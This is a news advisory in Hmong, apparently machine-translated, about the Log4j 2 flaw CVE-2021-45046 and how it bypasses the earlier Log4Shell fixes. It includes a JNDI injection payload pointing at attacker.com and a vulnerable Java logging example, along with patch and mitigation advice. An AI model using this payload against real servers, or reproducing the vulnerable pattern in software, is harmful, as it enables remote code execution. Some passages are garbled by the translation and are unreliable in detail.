Lwm qhov tsis zoo tau raug txheeb xyuas nyob rau hauv kev siv JNDI nrhiav hauv Log4j 2 lub tsev qiv ntawv (CVE-2021-45046), uas tshwm txawm tias cov kev kho ntxiv hauv kev tso tawm 2.15 thiab tsis hais txog kev siv "log4j2.noFormatMsgLookup" teeb tsa kev tiv thaiv. Qhov teeb meem yog qhov txaus ntshai feem ntau rau cov laus versions ntawm Log4j 2, tiv thaiv siv "noFormatMsgLookup" chij, vim nws ua rau nws muaj peev xwm hla kev tiv thaiv los ntawm qhov tsis zoo yav dhau los (Log4Shell, CVE-2021-44228), uas tso cai rau koj ua tiav koj cov cai ntawm lub server. Rau cov neeg siv ntawm version 2.15, kev siv dag zog tsuas yog ua rau daim ntawv thov sib tsoo vim muaj cov peev txheej txaus.
Qhov teeb meem tsuas yog tshwm sim ntawm cov tshuab uas siv Cov Ntsiab Lus Nrhiav rau kev nkag, xws li ${ctx:loginId}, lossis MDC templates (Thread Context Map), xws li %X, %mdc, thiab %MDC. Kev ua haujlwm los ntawm kev tsim cov xwm txheej rau kev tso tawm cov ntaub ntawv uas muaj JNDI hloov pauv rau lub cav thaum siv cov ntsiab lus queries lossis MDC templates hauv daim ntawv thov uas txhais cov cai rau formatting tso zis rau lub cav.
Cov kws tshawb fawb los ntawm LunaSec tau sau tseg tias rau cov versions ntawm Log4j tsawg dua 2.15, qhov tsis zoo no tuaj yeem siv los ua cov vector tshiab rau Log4Shell nres, ua rau kev ua tiav cov lej, yog tias ThreadContext kab lus uas suav nrog cov ntaub ntawv sab nraud siv hauv cov ntawv tso tawm, tsis hais seb lub "tiv thaiv" chij tau qhib. noMsgFormatLookups" lossis tus qauv "%m{nolookups}".
Kev hla kev tiv thaiv los ntawm qhov tseeb tias tsis yog kev hloov pauv ncaj qha ntawm "${jndi: ldap://attacker.com/a}", qhov kev qhia no tau hloov pauv los ntawm tus nqi ntawm qhov sib txawv nruab nrab uas siv rau hauv cov cai rau formatting log output . Piv txwv li, yog tias cov ntsiab lus nug ${ctx:apiversion} siv thaum tso tawm rau lub cav, ces qhov kev tawm tsam tuaj yeem ua tau los ntawm kev hloov cov ntaub ntawv β${jndi:ldap://attacker.com/a}β rau hauv tus nqi sau rau apiversion sib txawv. Piv txwv ntawm qhov tsis zoo code: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") pej xeem String index(@RequestHeader("X-Api-Version") String apiVersion) { // HTTP header tus nqi "X-Api-Version" yog dhau mus rau ThreadContext ThreadContext.put("apiversion ", apiVersion ); // Thaum nkag mus, tus nqi apiversion sab nraud yuav ua tiav siv qhov hloov pauv ${ctx:apiversion} logger.info("Tau txais kev thov rau API version"); rov "Nyob zoo, ntiaj teb!"; }
Hauv Log4j version 2.15, qhov muaj qhov tsis zoo tuaj yeem siv los ua DoS tawm tsam thaum dhau qhov tseem ceeb rau ThreadContext, ua rau lub voj voog hauv kev tsim cov qauv tsim qauv.
Hloov kho 2.16 thiab 2.12.2 tau tshaj tawm los thaiv qhov tsis muaj zog. Nyob rau hauv Log4j 2.16 ceg, ntxiv rau cov kev txhim kho hauv version 2.15 thiab kev khi ntawm JNDI LDAP thov rau "localhost", JNDI functionality yog xiam oob qhab los ntawm lub neej ntawd thiab kev txhawb nqa cov lus hloov pauv cov qauv raug tshem tawm. Raws li kev ruaj ntseg workaround, nws tau hais kom tshem tawm cov chav kawm JndiLookup los ntawm classpath (piv txwv li, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class") .
Koj tuaj yeem taug qab qhov tshwm sim ntawm kev txhim kho hauv pob khoom ntawm nplooj ntawv ntawm kev faib khoom (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) thiab Java platform tuam ntxhab (GitHub, Docker, Oracle, vmWare, Broadcom thiab Amazon / AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, thiab lwm yam).
Tau qhov twg los: opennet.ru